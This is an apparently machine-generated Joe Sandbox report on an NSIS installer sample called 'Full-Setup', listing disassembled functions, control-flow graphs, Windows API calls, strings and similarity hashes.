                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                          • API String ID: 2435955865-3712954417
                                                                                                                                                                          • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                          • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                          • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                          • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                          • String ID: jF
                                                                                                                                                                          • API String ID: 2295610775-3349280890
                                                                                                                                                                          • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                          • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                          • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                          • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 310444273-0
                                                                                                                                                                          • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                          • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                          • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                          • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                          APIs
                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                          Strings
                                                                                                                                                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                          • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                          • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                          • Call: %d, xrefs: 0040165A
                                                                                                                                                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                          • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                          • Rename: %s, xrefs: 004018F8
                                                                                                                                                                          • Jump: %d, xrefs: 00401602
                                                                                                                                                                          • BringToFront, xrefs: 004016BD
                                                                                                                                                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                          • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                          • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                          • detailprint: %s, xrefs: 00401679
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                          • API String ID: 2872004960-3619442763
                                                                                                                                                                          • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                          • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                          • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                          • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                          • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                          • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                          • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                          • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3282139019-0
                                                                                                                                                                          • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                          • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                          • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                          • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                            • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                            • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                          • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                          • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                          • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                          • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                            • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                          • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                          • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                          • API String ID: 608394941-2746725676
                                                                                                                                                                          • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                          • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                          • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                          • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,ExteriorGeographyWaterUniversities,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,ExteriorGeographyWaterUniversities,ExteriorGeographyWaterUniversities,00000000,00000000,ExteriorGeographyWaterUniversities,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427773,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
